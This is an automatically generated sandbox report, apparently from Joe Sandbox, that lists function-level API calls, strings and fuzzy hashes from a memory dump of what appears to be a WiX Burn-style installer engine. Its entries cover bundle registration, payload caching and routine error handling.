Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLastNameUser
String ID: Failed to get the user name.$Failed to set variant value.$variable.cpp
API String ID: 2054405381-1522884404
Opcode ID: 214c546f487a9e7080ad19b53f71efbca54634c5effba4ff05004285fc41e9d1
Instruction ID: 67ca01327beb3e265fc484319766594f12999fdf291af7feb928d5dd8f01d45b
Opcode Fuzzy Hash: 214c546f487a9e7080ad19b53f71efbca54634c5effba4ff05004285fc41e9d1
Instruction Fuzzy Hash: AB014972A4532967CB209B59DC06BAF77AC9B40720F014257FC14E7341DB749D408AD0

Function 009CFE21 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60windowCOMMON

Download Yara Rule

APIs

FormatMessageW.KERNEL32(00000900,?,?,00000000,00000000,00000000,?,00000000,?,?,009D04F4,?,?,?,?,00000001), ref: 009CFE40
GetLastError.KERNEL32(?,009D04F4,?,?,?,?,00000001,?,00995616,?,?,00000000,?,?,00995395,00000002), ref: 009CFE4C
LocalFree.KERNEL32(00000000,?,?,00000000,?,?,009D04F4,?,?,?,?,00000001,?,00995616,?,?), ref: 009CFEB5

Strings

logutil.cpp, xrefs: 009CFE6B

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorFormatFreeLastLocalMessage
String ID: logutil.cpp
API String ID: 1365068426-3545173039
Opcode ID: a54af1c8a926d6d795f6d62eced6ed13a671125bda304835f80fac1f5a468953
Instruction ID: 6b441c3e5755cb7fd461a49eb64a7d8b3ff34d001d632ea19360047e3fcb8015
Opcode Fuzzy Hash: a54af1c8a926d6d795f6d62eced6ed13a671125bda304835f80fac1f5a468953
Instruction Fuzzy Hash: F911BF32A41129EBDB21AF85CD15FEF7B6AEF54B10F01402AFD0497171D7318E60E6A2

Function 009B6B88 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 40COMMON

Download Yara Rule

APIs

ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000003,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,009B6B32,00000000,00000003), ref: 009B6B9F
GetLastError.KERNEL32(?,009B6B32,00000000,00000003,00000000,?,?,?,?,?,?,?,?,?,009B6F28,?), ref: 009B6BA9

Strings

Failed to set service start type., xrefs: 009B6BD7
msuengine.cpp, xrefs: 009B6BCD

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: ChangeConfigErrorLastService
String ID: Failed to set service start type.$msuengine.cpp
API String ID: 1456623077-1628545019
Opcode ID: eada62d85a8777ee85c40e3d9698cc974055bc2ca70e83691ec24c7a62fc3aac
Instruction ID: ce6725838c6501f5d24e813e14b14b14ceda91e93623b0f3d16b77d0ee7b0567
Opcode Fuzzy Hash: eada62d85a8777ee85c40e3d9698cc974055bc2ca70e83691ec24c7a62fc3aac
Instruction Fuzzy Hash: 51F0EC3368E135778B2126969D05F8B7E689F01BB0B114325FE38F61D0DA559D0081E0

Function 009C3C76 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 009C3D6E
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 009C3D78
UnhandledExceptionFilter.KERNEL32(80003CDD,?,?,?,?,?,?), ref: 009C3D85

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 2bc324e21a8879e3563c9eb474fb716cbc42022fc7d1ce8f00c9c5ef563c9b04
Instruction ID: 343abaf3b923b6f33d9e530cfe3b1937c4fcde9ce348bedb4e3817d31d34345b
Opcode Fuzzy Hash: 2bc324e21a8879e3563c9eb474fb716cbc42022fc7d1ce8f00c9c5ef563c9b04
Instruction Fuzzy Hash: 4931C27491122C9BCB21DF69D989BDCBBB8BF48310F5081EAE40DA6251EB309F819F45

Function 009C7B87 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

/, xrefs: 009C7C51

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: 83dc0a495261c6df7ce36ed908bc469358a523037583bdb1def93c2029eccdf7
Instruction ID: b014df73ad18afd00ae21e480e515999c22a7b58f9b408416072237fa9534739
Opcode Fuzzy Hash: 83dc0a495261c6df7ce36ed908bc469358a523037583bdb1def93c2029eccdf7
Instruction Fuzzy Hash: 424115729042196BCB209FB9DC89FBBB7BCEB84314F10466CF91597280E6319E81CB61

Function 009CA560 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f8f95bc5e7c876d0a1a0b2598f8063104ee7b1299e502c05a036ee161ca1c45
Instruction ID: 6fcafd3eca3565ea66191b8dbd2188adb183098512474f2eba6859db37972785
Opcode Fuzzy Hash: 4f8f95bc5e7c876d0a1a0b2598f8063104ee7b1299e502c05a036ee161ca1c45
Instruction Fuzzy Hash: 0802FB71E002199BDF14CFA9C980BADB7F5FF88328F25816DD919E7384D731A9418B92

Function 009D3A5F Relevance: 3.1, APIs: 2, Instructions: 58memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 009D3BF1: RegCloseKey.ADVAPI32(00000000,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,00020019,00000000,?,?,?,?,?,009D3A8E,?), ref: 009D3C62

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 009D3AB2
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 009D3AC3

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: AllocateCheckCloseInitializeMembershipToken
String ID:
API String ID: 2114926846-0
Opcode ID: 564810f883bf96c7a22d7c239be204252abf8bb1fd1e91ed01b086fc5c70136a
Instruction ID: a4076a78dbf928444f84ad686e02306d6a79d636c712b7e5adb01a1692e06290
Opcode Fuzzy Hash: 564810f883bf96c7a22d7c239be204252abf8bb1fd1e91ed01b086fc5c70136a
Instruction Fuzzy Hash: 41113971A4020EABDB10DFA4DC85BAFB7BCFF08301F54882EA541A6241E7709A40CB62

Function 009D4440 Relevance: 3.0, APIs: 2, Instructions: 44fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(009B923A,?,00000100,00000000,00000000), ref: 009D447B
FindClose.KERNEL32(00000000), ref: 009D4487

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: e6aea8d5550d6111942cf11c5b85bf10a4355c6d978f2250334fa2db7ba26524
Instruction ID: dd621c5bb414c81b18b8c8b57645d7c21bec5d4b46ee588a7caa5a0a25dae054
Opcode Fuzzy Hash: e6aea8d5550d6111942cf11c5b85bf10a4355c6d978f2250334fa2db7ba26524
Instruction Fuzzy Hash: 0C01F97160020CABCB10EF69ED89FABB3ACEFC5325F004066F918D3250D6345D898754

Function 009C2C18 Relevance: 2.7, Strings: 2, Instructions: 214COMMONLIBRARYCODE

Download Yara Rule

Strings

0, xrefs: 009C2D88
comres.dll, xrefs: 009C2DBF, 009C2DD8, 009C2E00, 009C2E2B

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID:
String ID: 0$comres.dll
API String ID: 0-3030269839
Opcode ID: f7a880ec5967ec64a90054ca813bf1243ddeae79b496adee3d9f08ad155e7dd2
Instruction ID: ceb3d0710479a7084715d2149bf93e60e4ce53805c95115fa7e7fb79bd3cf7cb
Opcode Fuzzy Hash: f7a880ec5967ec64a90054ca813bf1243ddeae79b496adee3d9f08ad155e7dd2
Instruction Fuzzy Hash: 59517960E84B0557DF388B688596FBF238D9B66740F184DADE8C3DB2D2C619DE418363

Function 009CEE7C Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,009CEE77,?,?,00000008,?,?,009CEB17,00000000), ref: 009CF0A9

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 424b779e980d04843070e6b12680eca616fc0ffba346e52a79ba738e66b444d3
Instruction ID: d5b5a1c3759e100e93dff129a0641a5e7e64def2ab6e1ceca95c59651bd06b05
Opcode Fuzzy Hash: 424b779e980d04843070e6b12680eca616fc0ffba346e52a79ba738e66b444d3
Instruction Fuzzy Hash: 3EB12A31910609DFD715CF28C496B657BE1FF45364F29866CE89ACF2A2C335E981CB41

Function 009BEC07 Relevance: 1.6, APIs: 1, Instructions: 133COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 009BEC20

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: e01d4f7288cc474839aa1082a4dc434ed4ee4136d9a90959bad6e066851c9ddb
Instruction ID: aee2e09c33f2c2cac1ec172dd9c332b169c959ed3ebb19830516e1a189e6a911
Opcode Fuzzy Hash: e01d4f7288cc474839aa1082a4dc434ed4ee4136d9a90959bad6e066851c9ddb
Instruction Fuzzy Hash: C0518DB1D142058BDB18CF99D9857FABBF8FB88320F24856AD409EB290D3B5AD00DF51

Function 009BE9DC Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0002E9E8,009BE131), ref: 009BE9E1

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 6ebd0d45a3f891aabcf5730630a2761b14a5c72713b50a28f1739e76d515ec73
Instruction ID: 544ab8f5b08aa35f20bc58a0191ceb735b654b3d38e65fd5d96fd0c075bc2bd5
Opcode Fuzzy Hash: 6ebd0d45a3f891aabcf5730630a2761b14a5c72713b50a28f1739e76d515ec73
Instruction Fuzzy Hash:

Function 009BFB89 Relevance: .5, Instructions: 481COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 597bb6c1bb76f25649455a6394172e1d9ec66d707e9817ff59eee4b3967e960f
Instruction ID: c82965360840ea8a9d326b462b0d1e4f1e8ff186700ee134a8746baa23fd7d1d
Opcode Fuzzy Hash: 597bb6c1bb76f25649455a6394172e1d9ec66d707e9817ff59eee4b3967e960f
Instruction Fuzzy Hash: 810219321091A20BDF2D8A3989705BB7FE56A833B071E47ADD8F6CF0D6DE20D564D660

Function 009C0B6F Relevance: .4, Instructions: 352COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 713254dbb735968c7063ac25a152bc56bcdf297f8f834348282298adb5de4d15
Instruction ID: 1c7ba3326e0b26b7cf25789f496c0cf75641374333a0d4e608e8dc4355ce3824
Opcode Fuzzy Hash: 713254dbb735968c7063ac25a152bc56bcdf297f8f834348282298adb5de4d15
Instruction Fuzzy Hash: 65C1A4335491A28BEF6D43398434A7EBBA55AD23B1B1E0B9DD4F2CB0C5EE209534D621

Function 009C07AA Relevance: .3, Instructions: 347COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3c7a540a95456d95b2f03679edd2d49eac6f1621006280bdad19664e1d0b21d
Instruction ID: 631346c6bc6b328db797a0038333636861a6865bbffef8f6a047976cc6028ced
Opcode Fuzzy Hash: f3c7a540a95456d95b2f03679edd2d49eac6f1621006280bdad19664e1d0b21d
Instruction Fuzzy Hash: 7EC1C7339051A28AEF2D42398434A7EFBE55EC23B0B1E579DD4F2CB1C6EE209534D621

Function 009C03D5 Relevance: .3, Instructions: 331COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43c190a499e79552c1a64f39d84a7142e521bf6eb77b491d3645054bb47bb5be
Instruction ID: 9599b8bbd2b5fcbe15efa7e4bf16371c6977c9a6c6ccc1417096c80757d2a6a3
Opcode Fuzzy Hash: 43c190a499e79552c1a64f39d84a7142e521bf6eb77b491d3645054bb47bb5be
Instruction Fuzzy Hash: EFC1D4325051A28BEF2D863D8534A7FBBE55AD23B0B1A079DD4F2CB1D1EE20D534DA21

Function 009C001D Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3d2de95a5a3d7d395022a3d348c00081b72a5afa3478eed40d51441493dea68
Instruction ID: 5ad6b5f6b10d19c3719b82602f5fb7d741b2e52f2b5119df3d58600b263d414c
Opcode Fuzzy Hash: c3d2de95a5a3d7d395022a3d348c00081b72a5afa3478eed40d51441493dea68
Instruction Fuzzy Hash: 32B1C6339091A28BEF2D42398434A3EFBE55AD23B1B1F179DD4B2CB1C5EE209534D621

Function 009C2E47 Relevance: .2, Instructions: 237COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ba96a3b881893b336ecfa6e7d608e03da8f6ff3e93525aa62e69564fbfc8f82
Instruction ID: a9bc11785c250f16939015c11089bb005a5c95d74e321417b6f3ab1fb5f0bc3f
Opcode Fuzzy Hash: 3ba96a3b881893b336ecfa6e7d608e03da8f6ff3e93525aa62e69564fbfc8f82
Instruction Fuzzy Hash: D0614871E0470CA6DB389B288895FBE63ADAB81700F54891EF983EF2C1D615DE818357

Function 0099FF99 Relevance: 84.5, APIs: 1, Strings: 47, Instructions: 484registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000101,?,?,00020006,00000000), ref: 009A0592

Strings

HelpLink, xrefs: 009A025A, 009A026D
URLUpdateInfo, xrefs: 009A02CC, 009A02DF
Failed to write software tags., xrefs: 009A04C5
%hu.%hu.%hu.%hu, xrefs: 009A00F0
Failed to update resume mode., xrefs: 009A056D
Contact, xrefs: 009A0362, 009A0375
ParentKeyName, xrefs: 009A0312, 009A0325
3.11.1.2318, xrefs: 009A0193
DisplayIcon, xrefs: 009A01BB, 009A01C5
Failed to write %ls value., xrefs: 009A0531
/uninstall, xrefs: 009A047B, 009A0480
"%ls" /modify, xrefs: 009A03B0
BundleTag, xrefs: 009A017B, 009A0180
NoRemove, xrefs: 009A0403, 009A0416
Failed to create registration key., xrefs: 009A001C
Publisher, xrefs: 009A0234, 009A0247
BundleCachePath, xrefs: 009A003C, 009A0041
HelpTelephone, xrefs: 009A0280, 009A0293
VersionMajor, xrefs: 009A010F, 009A0115
%hs, xrefs: 009A0198
VersionMinor, xrefs: 009A0138, 009A013E
"%ls" /uninstall /quiet, xrefs: 009A0448
NoElevateOnModify, xrefs: 009A03D7, 009A03EA
%s,0, xrefs: 009A01C0
URLInfoAbout, xrefs: 009A02A6, 009A02B9
NoModify, xrefs: 009A038B, 009A039E
UninstallString, xrefs: 009A0489, 009A049F
SystemComponent, xrefs: 009A0428, 009A043B
Failed to register the bundle dependency key., xrefs: 009A0553
Failed to write update registration., xrefs: 009A04E5
BundleAddonCode, xrefs: 009A0075, 009A007D
EngineVersion, xrefs: 009A019D, 009A01A2
BundlePatchCode, xrefs: 009A00B1, 009A00B9
BundleDetectCode, xrefs: 009A0093, 009A009B
Failed to update name and publisher., xrefs: 009A01EE
BundleUpgradeCode, xrefs: 009A0057, 009A005F
DisplayVersion, xrefs: 009A0201, 009A0214
/modify, xrefs: 009A0474
BundleVersion, xrefs: 009A00CF, 009A00F5
BundleProviderKey, xrefs: 009A015A, 009A015F
ModifyPath, xrefs: 009A03B5, 009A03CB
"%ls" %ls, xrefs: 009A0484
QuietUninstallString, xrefs: 009A044D, 009A0463
EstimatedSize, xrefs: 009A051C, 009A0521, 009A0530
ParentDisplayName, xrefs: 009A02F2, 009A0305
Comments, xrefs: 009A033A, 009A034D
Failed to cache bundle from path: %ls, xrefs: 0099FFEF

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: Close
String ID: /uninstall$"%ls" %ls$"%ls" /modify$"%ls" /uninstall /quiet$%hs$%hu.%hu.%hu.%hu$%s,0$/modify$3.11.1.2318$BundleAddonCode$BundleCachePath$BundleDetectCode$BundlePatchCode$BundleProviderKey$BundleTag$BundleUpgradeCode$BundleVersion$Comments$Contact$DisplayIcon$DisplayVersion$EngineVersion$EstimatedSize$Failed to cache bundle from path: %ls$Failed to create registration key.$Failed to register the bundle dependency key.$Failed to update name and publisher.$Failed to update resume mode.$Failed to write %ls value.$Failed to write software tags.$Failed to write update registration.$HelpLink$HelpTelephone$ModifyPath$NoElevateOnModify$NoModify$NoRemove$ParentDisplayName$ParentKeyName$Publisher$QuietUninstallString$SystemComponent$URLInfoAbout$URLUpdateInfo$UninstallString$VersionMajor$VersionMinor
API String ID: 3535843008-2755343042
Opcode ID: 4018d66a3f6887ab566f560d70f75ba2128edd6f294cb0289418e536f1da4700
Instruction ID: a3020dc4353b2571b3df30a6bdf199199434e8105df4b7913f524ee647b27d3a
Opcode Fuzzy Hash: 4018d66a3f6887ab566f560d70f75ba2128edd6f294cb0289418e536f1da4700
Instruction Fuzzy Hash: E7F1F332E8076ABBCF235A62CD12FAD76A4BBC5714F050161FD00B6261D7B1ED60EAC0

Function 0099CDBD Relevance: 73.9, APIs: 3, Strings: 39, Instructions: 366COMMON

Download Yara Rule

APIs

Part of subcall function 0099394F: GetProcessHeap.KERNEL32(?,000001C7,?,00992274,000001C7,00000001,80004005,8007139F,?,?,009D0267,8007139F,?,00000000,00000000,8007139F), ref: 00993960
Part of subcall function 0099394F: RtlAllocateHeap.NTDLL(00000000,?,00992274,000001C7,00000001,80004005,8007139F,?,?,009D0267,8007139F,?,00000000,00000000,8007139F), ref: 00993967

CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,download,000000FF,00000000,Packaging,00000000,00000000,FilePath,0099545D,00000000,009DCA9C,00995445,00000000), ref: 0099CEF3

Strings

Failed to get @DownloadUrl., xrefs: 0099D1EA
CertificateRootThumbprint, xrefs: 0099D07A
Failed to to find container: %ls, xrefs: 0099D186
Failed to get @Packaging., xrefs: 0099D213
Packaging, xrefs: 0099CEC6
Invalid value for @Packaging: %ls, xrefs: 0099D200
Failed to get @FileSize., xrefs: 0099D1AB
payload.cpp, xrefs: 0099CE3F
Failed to get next node., xrefs: 0099D228
SourcePath, xrefs: 0099CFB0
Failed to hex decode the Payload/@Hash., xrefs: 0099D1DC
CertificateRootPublicKeyIdentifier, xrefs: 0099D03D
Failed to hex decode @CertificateRootThumbprint., xrefs: 0099D1C0
external, xrefs: 0099CF21
Failed to get payload node count., xrefs: 0099CE10
